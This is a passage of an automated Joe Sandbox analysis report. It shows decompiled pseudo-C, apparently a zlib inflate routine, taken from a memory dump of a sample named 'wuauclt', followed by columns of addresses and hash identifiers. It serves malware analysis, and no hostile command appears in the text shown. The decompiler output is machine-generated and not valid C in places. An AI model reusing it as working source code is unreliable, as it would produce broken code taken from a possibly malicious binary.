                                                							__eax = __ebx[1];
                                                							__ecx = __ebx[2];
                                                							__edx = __eax;
                                                							__eax = __eax & 0x0000001f;
                                                							__edx = __edx >> 5;
                                                							if(__ebx[2] >= __eax) {
                                                								L88:
                                                								__ecx = __ebx[9];
                                                								__eax = __ebx[1];
                                                								__edx = __esp + 0x40;
                                                								__ecx = __esp + 0x44;
                                                								__edx = __esp + 0x2c;
                                                								__ecx = __esp + 0x30;
                                                								__edx = __ebx[3];
                                                								__eax = __eax >> 5;
                                                								__ecx = __eax >> 0x00000005 & 0x0000001f;
                                                								__eax = __eax & 0x0000001f;
                                                								__ecx = __ecx + 1;
                                                								__eax = __eax + 0x101;
                                                								__ebx[5] = 0;
                                                								 *(__esp + 0x44) = 9;
                                                								 *(__esp + 0x40) = 6;
                                                								__eax = E002533F0(__eax, __ecx, __ebx[3], __ecx, __esp + 0x2c, __ecx, __esp + 0x40, __ebx[9], __esi);
                                                								 *(__esp + 0x18) = __eax;
                                                								if(__eax != 0) {
                                                									if( *(__esp + 0x18) == 0xfffffffd) {
                                                										__ecx = __ebx[3];
                                                										__edx =  *(__esi + 0x28);
                                                										_push(__ebx[3]);
                                                										_push( *(__esi + 0x28));
                                                										__eax =  *((intOrPtr*)(__esi + 0x24))();
                                                										__esp = __esp + 8;
                                                										 *__ebx = 9;
                                                									}
                                                									__eax =  *(__esp + 0x14);
                                                									__ebx[8] = __edi;
                                                									__ebx[7] = __ebp;
                                                									__edi =  *__esi;
                                                									__edx =  *(__esi + 8);
                                                									 *(__esi + 4) =  *(__esp + 0x14);
                                                									__eax =  *(__esp + 0x10);
                                                									__ecx = __eax;
                                                									 *__esi = __eax;
                                                									__eax =  *(__esp + 0x18);
                                                									__ecx = __ecx -  *__esi;
                                                									__edx =  *(__esi + 8) + __ecx;
                                                									 *(__esi + 8) =  *(__esi + 8) + __ecx;
                                                									__edx =  *(__esp + 0x48);
                                                									__ebx[0xd] =  *(__esp + 0x48);
                                                									__eax = E002535B0(__ebx, __esi,  *(__esp + 0x18));
                                                									_pop(__edi);
                                                									_pop(__esi);
                                                									return __eax;
                                                								} else {
                                                									__edx =  *(__esp + 0x38);
                                                									__eax =  *(__esp + 0x3c);
                                                									__ecx =  *(__esp + 0x1c);
                                                									__edx =  *(__esp + 0x28);
                                                									__eax = E00252670( *(__esp + 0x28),  *(__esp + 0x1c),  *(__esp + 0x3c),  *(__esp + 0x28), __esi);
                                                									if(__eax == 0) {
                                                										__eax =  *(__esp + 0x10);
                                                										__ecx =  *(__esp + 0x14);
                                                										__ebx[8] = __edi;
                                                										__ebx[7] = __ebp;
                                                										__edi =  *__esi;
                                                										__edx = __eax;
                                                										 *(__esi + 4) =  *(__esp + 0x14);
                                                										__ecx =  *(__esi + 8);
                                                										__edx = __eax -  *__esi;
                                                										 *__esi = __eax;
                                                										__eax =  *(__esp + 0x44);
                                                										__ecx =  *(__esi + 8) + __edx;
                                                										 *(__esi + 8) =  *(__esi + 8) + __edx;
                                                										__ebx[0xd] =  *(__esp + 0x44);
                                                										__eax = E002535B0(__ebx, __esi, 0xfffffffc);
                                                										_pop(__edi);
                                                										_pop(__esi);
                                                										return __eax;
                                                									} else {
                                                										__ebx[1] = __eax;
                                                										__eax = __ebx[3];
                                                										__ecx =  *(__esi + 0x28);
                                                										_push(__ebx[3]);
                                                										_push( *(__esi + 0x28));
                                                										__eax =  *((intOrPtr*)(__esi + 0x24))();
                                                										__esp = __esp + 8;
                                                										 *__ebx = 6;
                                                										goto L92;
                                                									}
                                                								}
                                                							} else {
                                                								do {
                                                									__eax = __ebx[4];
                                                									if(__ebp >= __eax) {
                                                										L73:
                                                										__eax =  *(0x2723c8 + __eax * 4);
                                                										__ecx = __ebx[5];
                                                										__eax = __eax & __edi;
                                                										__edx = 0;
                                                										__eax = __ebx[5] + __eax * 8;
                                                										 *(__esp + 0x18) = 0;
                                                										__eax =  *(__eax + 4);
                                                										 *(__esp + 0x34) = __eax;
                                                										if(__eax >= 0x10) {
                                                											__ecx = 7;
                                                											if(__eax != 0x12) {
                                                												__ecx = __eax - 0xe;
                                                											}
                                                											__eax = __eax - 0x12;
                                                											 *(__esp + 0x1c) = __ecx;
                                                											__eax =  ~__eax;
                                                											asm("sbb eax, eax");
                                                											__ecx = __edx + __ecx;
                                                											__al = __al & 0x000000f8;
                                                											 *(__esp + 0x20) = __ecx;
                                                											__eax = __eax + 0xb;
                                                											if(__ebp >= __ecx) {
                                                												L81:
                                                												__ecx = __edx;
                                                												__edi = __edi >> __cl;
                                                												 *(__esp + 0x1c) =  *(0x2723c8 +  *(__esp + 0x1c) * 4);
                                                												__ecx =  *(0x2723c8 +  *(__esp + 0x1c) * 4) & __edi;
                                                												__eax = __eax + ( *(0x2723c8 +  *(__esp + 0x1c) * 4) & __edi);
                                                												__ecx =  *(__esp + 0x1c);
                                                												__edi = __edi >> __cl;
                                                												__ecx =  *(__esp + 0x1c) + __edx;
                                                												 *(__esp + 0x18) = __eax;
                                                												__ebp = __ebp -  *(__esp + 0x1c) + __edx;
                                                												__ecx = __ebx[2];
                                                												 *(__esp + 0x1c) = __ebx[2];
                                                												__ecx = __ebx[1];
                                                												__edx = __ecx;
                                                												__ecx = __ecx & 0x0000001f;
                                                												__edx = __edx >> 5;
                                                												__ecx = __edx + __ecx + 0x102;
                                                												__edx =  *(__esp + 0x1c);
                                                												if(__eax > __ecx) {
                                                													L112:
                                                													__edx = __ebx[3];
                                                													__eax =  *(__esi + 0x28);
                                                													_push(__ebx[3]);
                                                													_push( *(__esi + 0x28));
                                                													__eax =  *((intOrPtr*)(__esi + 0x24))();
                                                													__eax =  *(__esp + 0x18);
                                                													__ecx =  *(__esp + 0x1c);
                                                													 *__ebx = 9;
                                                													 *(__esi + 0x18) = "invalid bit length repeat";
                                                													__ebx[8] = __edi;
                                                													__ebx[7] = __ebp;
                                                													__edi =  *__esi;
                                                													__edx = __eax;
                                                													 *(__esi + 4) =  *(__esp + 0x1c);
                                                													__ecx =  *(__esi + 8);
                                                													__edx = __eax -  *__esi;
                                                													 *__esi = __eax;
                                                													__eax =  *(__esp + 0x4c);
                                                													__ecx =  *(__esi + 8) + __edx;
                                                													 *(__esi + 8) =  *(__esi + 8) + __edx;
                                                													__ebx[0xd] =  *(__esp + 0x4c);
                                                													__eax = E002535B0(__ebx, __esi, 0xfffffffd);
                                                													_pop(__edi);
                                                													_pop(__esi);
                                                													return __eax;
                                                												} else {
                                                													if( *(__esp + 0x34) != 0x10) {
                                                														__eax =  *(__esp + 0x1c);
                                                														__ecx = 0;
                                                														goto L86;
                                                													} else {
                                                														__eax = __edx;
                                                														if(__eax < 1) {
                                                															goto L112;
                                                														} else {
                                                															__ecx = __ebx[3];
                                                															__ecx =  *(__ebx[3] + __eax * 4 - 4);
                                                															do {
                                                																L86:
                                                																__edx = __ebx[3];
                                                																__eax = __eax + 1;
                                                																 *(__ebx[3] + __eax * 4 - 4) = __ecx;
                                                																__edx =  *(__esp + 0x18);
                                                																__edx =  *(__esp + 0x18) - 1;
                                                																 *(__esp + 0x18) = __edx;
                                                															} while (__edx != 0);
                                                															goto L87;
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												while(1) {
                                                													__ecx =  *(__esp + 0x14);
                                                													if(__ecx == 0) {
                                                														goto L111;
                                                													}
                                                													__edx = __ecx;
                                                													__ecx = 0;
                                                													__edx = __edx - 1;
                                                													 *(__esp + 0x4c) = 0;
                                                													 *(__esp + 0x14) = __edx;
                                                													__edx =  *(__esp + 0x10);
                                                													__cl =  *( *(__esp + 0x10));
                                                													__edx = 0;
                                                													__ecx = __ebp;
                                                													__edx = 0 << __cl;
                                                													__ecx =  *(__esp + 0x10);
                                                													__ebp = 8 + __ebp;
                                                													__edi = __edi | 0 << __cl;
                                                													__ecx =  *(__esp + 0x10) + 1;
                                                													 *(__esp + 0x10) =  *(__esp + 0x10) + 1;
                                                													__ecx =  *(__esp + 0x20);
                                                													if(__ebp <  *(__esp + 0x20)) {
                                                														continue;
                                                													} else {
                                                														__edx =  *(__esp + 0x18);
                                                														goto L81;
                                                													}
                                                													goto L127;
                                                												}
                                                												goto L111;
                                                											}
                                                										} else {
                                                											__ecx = 0;
                                                											__ebp = __ebp;
                                                											__edx = __ebx[3];
                                                											__edi = __edi >> __cl;
                                                											__ecx = __ebx[2];
                                                											 *(__ebx[3] + __ebx[2] * 4) = __eax;
                                                											__eax = __ebx[2];
                                                											__eax = __ebx[2] + 1;
                                                											goto L87;
                                                										}
                                                									} else {
                                                										while(1) {
                                                											__ecx =  *(__esp + 0x14);
                                                											if(__ecx == 0) {
                                                												break;
                                                											}
                                                											__edx = __ecx;
                                                											__ecx = 0;
                                                											__edx = __edx - 1;
                                                											 *(__esp + 0x4c) = 0;
                                                											 *(__esp + 0x14) = __edx;
                                                											__edx =  *(__esp + 0x10);
                                                											__cl =  *( *(__esp + 0x10));
                                                											__edx = 0;
                                                											__ecx = __ebp;
                                                											__edx = 0 << __cl;
                                                											__ecx =  *(__esp + 0x10);
                                                											__ebp = 8 + __ebp;
                                                											__edi = __edi | 0 << __cl;
                                                											__ecx =  *(__esp + 0x10) + 1;
                                                											 *(__esp + 0x10) =  *(__esp + 0x10) + 1;
                                                											if(__ebp < __eax) {
                                                												continue;
                                                											} else {
                                                												goto L73;
                                                											}
                                                											goto L127;
                                                										}
                                                										L111:
                                                										__eax =  *(__esp + 0x10);
                                                										__ebx[8] = __edi;
                                                										__ebx[7] = __ebp;
                                                										__edi =  *__esi;
                                                										__ecx =  *(__esi + 8);
                                                										__edx = __eax;
                                                										__edx = __eax -  *__esi;
                                                										 *__esi = __eax;
                                                										__eax =  *(__esp + 0x44);
                                                										__ecx =  *(__esi + 8) + __edx;
                                                										 *(__esi + 8) =  *(__esi + 8) + __edx;
                                                										__ecx =  *(__esp + 0x4c);
                                                										 *(__esi + 4) = 0;
                                                										__ebx[0xd] =  *(__esp + 0x44);
                                                										__eax = E002535B0(__ebx, __esi,  *(__esp + 0x4c));
                                                										_pop(__edi);
                                                										_pop(__esi);
                                                										return __eax;
                                                									}
                                                									goto L127;
                                                									L87:
                                                									__ebx[2] = __eax;
                                                									__eax = __ebx[1];
                                                									__ecx = __ebx[2];
                                                									__eax = __eax >> 5;
                                                									__edx = __eax >> 0x00000005 & 0x0000001f;
                                                									__eax = __eax & 0x0000001f;
                                                								} while (__ebx[2] < __eax);
                                                								goto L88;
                                                							}
                                                							goto L127;
                                                						case 6:
                                                							__edi =  *(__esp + 0x18);
                                                							__esi =  *(__esp + 0x48);
                                                							L92:
                                                							__eax =  *(__esp + 0x10);
                                                							__edx =  *(__esp + 0x14);
                                                							__ebx[8] = __edi;
                                                							__ebx[7] = __ebp;
                                                							__edi =  *__esi;
                                                							__ecx = __eax;
                                                							 *(__esi + 4) =  *(__esp + 0x14);
                                                							__edx =  *(__esi + 8);
                                                							__ecx = __eax -  *__esi;
                                                							 *__esi = __eax;
                                                							__eax =  *(__esp + 0x4c);
                                                							__edx =  *(__esi + 8) + __ecx;
                                                							 *(__esi + 8) =  *(__esi + 8) + __ecx;
                                                							__edx =  *(__esp + 0x44);
                                                							_push( *(__esp + 0x4c));
                                                							_push(__esi);
                                                							_push(__ebx);
                                                							__ebx[0xd] = __edx;
                                                							__eax = E002526B0();
                                                							__esp = __esp + 0xc;
                                                							if(__eax != 1) {
                                                								goto L121;
                                                							} else {
                                                								__ecx = __ebx[1];
                                                								 *(__esp + 0x54) = 0;
                                                								E00252E60(__ebx[1], __esi) = __ebx[8];
                                                								__ecx = __ebx[0xd];
                                                								__edi =  *__esi;
                                                								__edx =  *(__esi + 4);
                                                								__ebp = __ebx[7];
                                                								 *(__esp + 0x20) = __ebx[8];
                                                								__eax = __ebx[0xc];
                                                								 *(__esp + 0x10) = __edi;
                                                								 *(__esp + 0x14) =  *(__esi + 4);
                                                								 *(__esp + 0x44) = __ecx;
                                                								if(__ecx >= __eax) {
                                                									__eax = __ebx[0xb];
                                                									__eax = __ebx[0xb] - __ecx;
                                                								} else {
                                                									__eax = __eax - __ecx;
                                                									__eax = __eax - 1;
                                                								}
                                                								 *(__esp + 0x1c) = __eax;
                                                								__eax = __ebx[6];
                                                								if(__ebx[6] != 0) {
                                                									 *__ebx = 7;
                                                									goto L119;
                                                								} else {
                                                									 *__ebx = 0;
                                                									goto L4;
                                                								}
                                                							}
                                                							goto L127;
                                                						case 7:
                                                							__ecx =  *(__esp + 0x44);
                                                							__esi =  *(__esp + 0x48);
                                                							__edi =  *(__esp + 0x10);
                                                							L119:
                                                							__ebx[0xd] = __ecx;
                                                							__ecx =  *(__esp + 0x4c);
                                                							__eax = E002535B0(__ebx, __esi,  *(__esp + 0x4c));
                                                							__ecx = __ebx[0xd];
                                                							__edx = __ebx[0xc];
                                                							if(__ebx[0xc] == __ecx) {
                                                								 *__ebx = 8;
                                                								goto L124;
                                                							} else {
                                                								__edx =  *(__esp + 0x18);
                                                								__ebx[7] = __ebp;
                                                								__ebx[8] =  *(__esp + 0x18);
                                                								__edx =  *(__esp + 0x14);
                                                								__ebp =  *__esi;
                                                								 *(__esi + 4) =  *(__esp + 0x14);
                                                								__edx = __edi;
                                                								 *__esi = __edi;
                                                								__edx = __edi -  *__esi;
                                                								 *(__esi + 8) =  *(__esi + 8) + __edi -  *__esi;
                                                								 *(__esi + 8) =  *(__esi + 8) + __edi -  *__esi;
                                                								__ebx[0xd] = __ecx;
                                                								L121:
                                                								__eax = E002535B0(__ebx, __esi, __eax);
                                                								_pop(__edi);
                                                								_pop(__esi);
                                                								return __eax;
                                                							}
                                                							goto L127;
                                                						case 8:
                                                							__ecx =  *(__esp + 0x44);
                                                							__esi =  *(__esp + 0x48);
                                                							__edi =  *(__esp + 0x10);
                                                							L124:
                                                							__eax =  *(__esp + 0x18);
                                                							__edx =  *(__esp + 0x14);
                                                							__ebx[8] =  *(__esp + 0x18);
                                                							__ebx[7] = __ebp;
                                                							__ebp =  *__esi;
                                                							__eax = __edi;
                                                							 *(__esi + 4) =  *(__esp + 0x14);
                                                							__edx =  *(__esi + 8);
                                                							__eax = __edi -  *__esi;
                                                							__edx =  *(__esi + 8) + __edi -  *__esi;
                                                							 *(__esi + 8) =  *(__esi + 8) + __edi -  *__esi;
                                                							 *__esi = __edi;
                                                							__ebx[0xd] = __ecx;
                                                							__eax = E002535B0(__ebx, __esi, 1);
                                                							_pop(__edi);
                                                							_pop(__esi);
                                                							return __eax;
                                                							goto L127;
                                                						case 9:
                                                							__ecx =  *(__esp + 0x18);
                                                							__eax =  *(__esp + 0x48);
                                                							__edx =  *(__esp + 0x14);
                                                							__ebx[8] =  *(__esp + 0x18);
                                                							__ecx =  *(__esp + 0x10);
                                                							__ebx[7] = __ebp;
                                                							__esi =  *__eax;
                                                							__ebp =  *(__eax + 8);
                                                							 *(__eax + 4) =  *(__esp + 0x14);
                                                							__edx = __ecx;
                                                							__edx = __ecx -  *__eax;
                                                							 *__eax = __ecx;
                                                							__ecx =  *(__esp + 0x44);
                                                							__ebp = __edx +  *(__eax + 8);
                                                							 *(__eax + 8) = __edx +  *(__eax + 8);
                                                							__ebx[0xd] =  *(__esp + 0x44);
                                                							__eax = E002535B0(__ebx, __eax, 0xfffffffd);
                                                							_pop(__edi);
                                                							_pop(__esi);
                                                							return __eax;
                                                							goto L127;
                                                						case 0xa:
                                                							L14:
                                                							_t507 = _t504 - 3;
                                                							 *_t468 = 1;
                                                							_t483 = _t507 & 0x00000007;
                                                							_t504 = _t507 - _t483;
                                                							 *(_t510 + 0x18) = _t500 >> 3 >> _t483;
                                                							goto L4;
                                                						case 0xb:
                                                							L15:
                                                							__edx =  *(__esp + 0x48);
                                                							__eax = __esp + 0x24;
                                                							_push( *(__esp + 0x48));
                                                							__ecx = __esp + 0x2c;
                                                							__edx = __esp + 0x34;
                                                							__esp + 0x3c = E00253580(__esp + 0x3c, __esp + 0x34, __esp + 0x2c, __esp + 0x3c);
                                                							__ecx =  *(__esp + 0x5c);
                                                							__edx =  *(__esp + 0x38);
                                                							__eax =  *(__esp + 0x3c);
                                                							__ecx =  *(__esp + 0x44);
                                                							__edx =  *(__esp + 0x4c);
                                                							__eax = E00252670( *(__esp + 0x4c),  *(__esp + 0x44),  *(__esp + 0x3c),  *(__esp + 0x4c),  *(__esp + 0x5c));
                                                							__ebx[1] = __eax;
                                                							if(__eax == 0) {
                                                								__eax =  *(__esp + 0x48);
                                                								__edx =  *(__esp + 0x14);
                                                								__ebx[8] = __esi;
                                                								__ebx[7] = __ebp;
                                                								__ebp =  *(__eax + 8);
                                                								 *(__eax + 4) =  *(__esp + 0x14);
                                                								__edx =  *__eax;
                                                								__edi = __edi -  *__eax;
                                                								__edx =  *(__esp + 0x44);
                                                								__ebp = __edi -  *__eax +  *(__eax + 8);
                                                								 *(__eax + 8) = __edi -  *__eax +  *(__eax + 8);
                                                								 *__eax = __edi;
                                                								__ebx[0xd] =  *(__esp + 0x44);
                                                								__eax = E002535B0(__ebx, __eax, 0xfffffffc);
                                                								_pop(__edi);
                                                								_pop(__esi);
                                                								return __eax;
                                                							} else {
                                                								__esi = __esi >> 3;
                                                								 *(__esp + 0x18) = __esi;
                                                								__ebp = __ebp - 3;
                                                								 *__ebx = 6;
                                                								goto L4;
                                                							}
                                                							goto L127;
                                                						case 0xc:
                                                							L17:
                                                							__esi = __esi >> 3;
                                                							 *(__esp + 0x18) = __esi;
                                                							__ebp = __ebp - 3;
                                                							 *__ebx = 3;
                                                							goto L4;
                                                						case 0xd:
                                                							L100:
                                                							__eax =  *(__esp + 0x48);
                                                							__ecx =  *(__esp + 0x14);
                                                							 *__ebx = 9;
                                                							__ebp = __ebp + 0xfffffffd;
                                                							__esi = __esi >> 3;
                                                							 *(__eax + 0x18) = "invalid block type";
                                                							__ebx[8] = __esi;
                                                							__ebx[7] = __ebp;
                                                							__ebp =  *(__eax + 8);
                                                							 *(__eax + 4) =  *(__esp + 0x14);
                                                							__ecx =  *__eax;
                                                							__edi = __edi -  *__eax;
                                                							__ecx =  *(__esp + 0x48);
                                                							__ebp = __edi -  *__eax +  *(__eax + 8);
                                                							 *(__eax + 8) = __edi -  *__eax +  *(__eax + 8);
                                                							 *__eax = __edi;
                                                							__ebx[0xd] =  *(__esp + 0x48);
                                                							__eax = E002535B0(__ebx, __eax, 0xfffffffd);
                                                							_pop(__edi);
                                                							_pop(__esi);
                                                							return __eax;
                                                							L127:
                                                					}
                                                				}
                                                				_t459 =  *(_t510 + 0x48);
                                                				_t468[8] =  *(_t510 + 0x18);
                                                				_t468[7] = _t504;
                                                				 *(4 + _t459) =  *(_t510 + 0x14);
                                                				_t472 =  *(_t510 + 0x10);
                                                				 *_t459 = _t472;
                                                				 *((intOrPtr*)(8 + _t459)) =  *((intOrPtr*)(8 + _t459)) + _t472 -  *_t459;
                                                				_t468[0xd] =  *(_t510 + 0x48);
                                                				return E002535B0(_t468, _t459, 0xfffffffe);
                                                				goto L127;
                                                			}













                                                0x00251a17
                                                0x00251a20
                                                0x00251a24
                                                0x00251a19
                                                0x00251a19
                                                0x00251a1c
                                                0x00251a1c
                                                0x00251a26
                                                0x00251a26
                                                0x00251a0d
                                                0x00251a2c
                                                0x002520c4
                                                0x002520c8
                                                0x002520cc
                                                0x002520cf
                                                0x002520d3
                                                0x002520d6
                                                0x002520d8
                                                0x002520db
                                                0x002520de
                                                0x002520e0
                                                0x002520e2
                                                0x002520e4
                                                0x002520e6
                                                0x002520e9
                                                0x002520ec
                                                0x002520f3
                                                0x002520fb
                                                0x002520fc
                                                0x00252102
                                                0x00251a32
                                                0x00251a32
                                                0x00000000
                                                0x00251a32
                                                0x002519a0
                                                0x002519a0
                                                0x002519a3
                                                0x002519a8
                                                0x00000000
                                                0x002519aa
                                                0x002519aa
                                                0x002519ae
                                                0x002519b2
                                                0x002519bb
                                                0x002519b4
                                                0x002519b4
                                                0x002519b7
                                                0x002519b7
                                                0x002519bf
                                                0x002519c3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002519c3
                                                0x002519a8
                                                0x0025199e
                                                0x0025198f
                                                0x00000000
                                                0x00000000
                                                0x00251aac
                                                0x00251ab3
                                                0x00251aeb
                                                0x00251aeb
                                                0x00251aed
                                                0x00251af2
                                                0x00251af4
                                                0x00251af7
                                                0x00251afd
                                                0x00252182
                                                0x00252182
                                                0x00252186
                                                0x0025218a
                                                0x00252192
                                                0x00252199
                                                0x0025219c
                                                0x0025219f
                                                0x002521a1
                                                0x002521a4
                                                0x002521a7
                                                0x002521ac
                                                0x002521ae
                                                0x002521b0
                                                0x002521b4
                                                0x002521b6
                                                0x002521b9
                                                0x002521bc
                                                0x002521bf
                                                0x002521c7
                                                0x002521c8
                                                0x002521ce
                                                0x00251b03
                                                0x00251b05
                                                0x00251b11
                                                0x00000000
                                                0x00251b17
                                                0x00251b17
                                                0x00251b1b
                                                0x00251b1d
                                                0x00251b20
                                                0x00251b23
                                                0x00251b2a
                                                0x00251b2d
                                                0x00251b2e
                                                0x00251b2f
                                                0x00251b32
                                                0x00251b35
                                                0x00251b3a
                                                0x00252146
                                                0x0025214a
                                                0x0025214d
                                                0x00252150
                                                0x00252152
                                                0x00252155
                                                0x00252158
                                                0x00252161
                                                0x00252163
                                                0x00252165
                                                0x00252168
                                                0x0025216b
                                                0x0025216f
                                                0x00252172
                                                0x0025217a
                                                0x0025217b
                                                0x00252181
                                                0x00251b40
                                                0x00251b40
                                                0x00251b43
                                                0x00251b46
                                                0x00251b4d
                                                0x00000000
                                                0x00251b4d
                                                0x00251b3a
                                                0x00251b11
                                                0x00251ab5
                                                0x00251ab5
                                                0x00251ab9
                                                0x00251abd
                                                0x00251ac5
                                                0x00251ac7
                                                0x00251ac8
                                                0x00251aca
                                                0x00251ad2
                                                0x00251ad4
                                                0x00251ad6
                                                0x00251ad8
                                                0x00251adb
                                                0x00251adf
                                                0x00251ae1
                                                0x00251ae5
                                                0x00251ae9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00251ae9
                                                0x00252103
                                                0x00252107
                                                0x0025210b
                                                0x0025210e
                                                0x00252111
                                                0x00252113
                                                0x00252116
                                                0x00252118
                                                0x0025211a
                                                0x00252120
                                                0x00252122
                                                0x00252128
                                                0x0025212f
                                                0x00252133
                                                0x00252136
                                                0x0025213e
                                                0x0025213f
                                                0x00252145
                                                0x00252145
                                                0x00000000
                                                0x00000000
                                                0x00251b55
                                                0x00251b59
                                                0x00251b5d
                                                0x00251b5d
                                                0x00251b60
                                                0x00251b66
                                                0x00251b6b
                                                0x00251bdb
                                                0x00251bdb
                                                0x00251bde
                                                0x00251be5
                                                0x00251be7
                                                0x00251be7
                                                0x00251bea
                                                0x00251bf1
                                                0x00251bf4
                                                0x00251bfb
                                                0x00251bfe
                                                0x00251bff
                                                0x00251c01
                                                0x00251c04
                                                0x00251be7
                                                0x00251c08
                                                0x00251c0c
                                                0x00251c0f
                                                0x00251c13
                                                0x00251c19
                                                0x00251c1f
                                                0x00251c27
                                                0x00251c2d
                                                0x002521d4
                                                0x002521d6
                                                0x002521d9
                                                0x002521dc
                                                0x002521dd
                                                0x002521de
                                                0x002521e1
                                                0x002521e4
                                                0x002521e4
                                                0x002521ea
                                                0x002521ee
                                                0x002521f2
                                                0x002521f5
                                                0x002521f8
                                                0x002521fa
                                                0x002521fc
                                                0x002521ff
                                                0x00252202
                                                0x00252204
                                                0x00252206
                                                0x0025220a
                                                0x0025220c
                                                0x0025220f
                                                0x00252216
                                                0x00252219
                                                0x00252221
                                                0x00252222
                                                0x00252228
                                                0x00251c33
                                                0x00251c33
                                                0x00251c36
                                                0x00000000
                                                0x00251c36
                                                0x00251b6d
                                                0x00251b6d
                                                0x00251b70
                                                0x00000000
                                                0x00251b72
                                                0x00251b72
                                                0x00251b76
                                                0x00251b76
                                                0x00251b7c
                                                0x00000000
                                                0x00000000
                                                0x00251b82
                                                0x00251b84
                                                0x00251b86
                                                0x00251b89
                                                0x00251b8d
                                                0x00251b8f
                                                0x00251b91
                                                0x00251b94
                                                0x00251b96
                                                0x00251b9e
                                                0x00251ba0
                                                0x00251ba4
                                                0x00251ba8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00251ba8
                                                0x00000000
                                                0x00251b76
                                                0x00000000
                                                0x00251baa
                                                0x00251baa
                                                0x00251bad
                                                0x00251baf
                                                0x00251bb2
                                                0x00251bb5
                                                0x00251bbc
                                                0x00251bbf
                                                0x00251bc2
                                                0x00251bc5
                                                0x00251bc8
                                                0x00251bc9
                                                0x00251bcc
                                                0x00251bd1
                                                0x00251bd4
                                                0x00251bd7
                                                0x00000000
                                                0x00251b6d
                                                0x00000000
                                                0x00000000
                                                0x00251c3e
                                                0x00251c42
                                                0x00251c46
                                                0x00251c46
                                                0x00251c49
                                                0x00251c4c
                                                0x00251c4e
                                                0x00251c51
                                                0x00251c60
                                                0x00251df1
                                                0x00251df1
                                                0x00251df4
                                                0x00251df9
                                                0x00251dfd
                                                0x00251e03
                                                0x00251e07
                                                0x00251e0c
                                                0x00251e12
                                                0x00251e15
                                                0x00251e18
                                                0x00251e1b
                                                0x00251e1d
                                                0x00251e24
                                                0x00251e2b
                                                0x00251e33
                                                0x00251e3b
                                                0x00251e43
                                                0x00251e49
                                                0x002522c1
                                                0x002522c3
                                                0x002522c6
                                                0x002522c9
                                                0x002522ca
                                                0x002522cb
                                                0x002522ce
                                                0x002522d1
                                                0x002522d1
                                                0x002522d7
                                                0x002522db
                                                0x002522de
                                                0x002522e1
                                                0x002522e3
                                                0x002522e6
                                                0x002522e9
                                                0x002522ed
                                                0x002522ef
                                                0x002522f1
                                                0x002522f5
                                                0x002522f7
                                                0x002522fa
                                                0x002522fd
                                                0x00252303
                                                0x00252306
                                                0x0025230e
                                                0x0025230f
                                                0x00252315
                                                0x00251e4f
                                                0x00251e4f
                                                0x00251e53
                                                0x00251e57
                                                0x00251e5d
                                                0x00251e64
                                                0x00251e6e
                                                0x00252316
                                                0x0025231a
                                                0x0025231e
                                                0x00252321
                                                0x00252324
                                                0x00252326
                                                0x00252328
                                                0x0025232b
                                                0x0025232e
                                                0x00252330
                                                0x00252332
                                                0x00252336
                                                0x0025233b
                                                0x0025233f
                                                0x00252342
                                                0x0025234a
                                                0x0025234b
                                                0x00252351
                                                0x00251e74
                                                0x00251e74
                                                0x00251e77
                                                0x00251e7a
                                                0x00251e7d
                                                0x00251e7e
                                                0x00251e7f
                                                0x00251e82
                                                0x00251e85
                                                0x00000000
                                                0x00251e85
                                                0x00251e6e
                                                0x00251c66
                                                0x00251c66
                                                0x00251c66
                                                0x00251c6b
                                                0x00251ca8
                                                0x00251ca8
                                                0x00251caf
                                                0x00251cb2
                                                0x00251cb4
                                                0x00251cba
                                                0x00251cbd
                                                0x00251cc1
                                                0x00251cc7
                                                0x00251ccb
                                                0x00251ce8
                                                0x00251ced
                                                0x00251cef
                                                0x00251cef
                                                0x00251cf2
                                                0x00251cf5
                                                0x00251cf9
                                                0x00251cfb
                                                0x00251cfd
                                                0x00251cff
                                                0x00251d01
                                                0x00251d05
                                                0x00251d0a
                                                0x00251d4f
                                                0x00251d4f
                                                0x00251d51
                                                0x00251d57
                                                0x00251d5e
                                                0x00251d60
                                                0x00251d62
                                                0x00251d66
                                                0x00251d68
                                                0x00251d6a
                                                0x00251d6e
                                                0x00251d70
                                                0x00251d73
                                                0x00251d77
                                                0x00251d7a
                                                0x00251d7c
                                                0x00251d7f
                                                0x00251d85
                                                0x00251d8c
                                                0x00251d94
                                                0x00252268
                                                0x00252268
                                                0x0025226b
                                                0x0025226e
                                                0x0025226f
                                                0x00252270
                                                0x00252273
                                                0x00252277
                                                0x0025227b
                                                0x00252281
                                                0x00252288
                                                0x0025228b
                                                0x0025228e
                                                0x00252290
                                                0x00252292
                                                0x00252295
                                                0x00252298
                                                0x0025229a
                                                0x0025229c
                                                0x002522a0
                                                0x002522a5
                                                0x002522a9
                                                0x002522ac
                                                0x002522b4
                                                0x002522b5
                                                0x002522bb
                                                0x00251d9a
                                                0x00251d9f
                                                0x00251db5
                                                0x00251db9
                                                0x00000000
                                                0x00251da1
                                                0x00251da1
                                                0x00251da6
                                                0x00000000
                                                0x00251dac
                                                0x00251dac
                                                0x00251daf
                                                0x00251dbb
                                                0x00251dbb
                                                0x00251dbb

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$invalid stored block lengths
                                                • API String ID: 0-2993959977
                                                • Opcode ID: 9427d0e82036d2061532009b219701dc1d562e98beb7c34530e794e232200767
                                                • Instruction ID: 3a0387529917919b3716c5ccc7a2983cb11233bc5db7fbb95b1961682ade4525
                                                • Opcode Fuzzy Hash: 9427d0e82036d2061532009b219701dc1d562e98beb7c34530e794e232200767
                                                • Instruction Fuzzy Hash: 5C426DB56143018FCB08CF19D88062ABBE6FFC9301F14856DEC898B356E771E959CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E002526B0() {
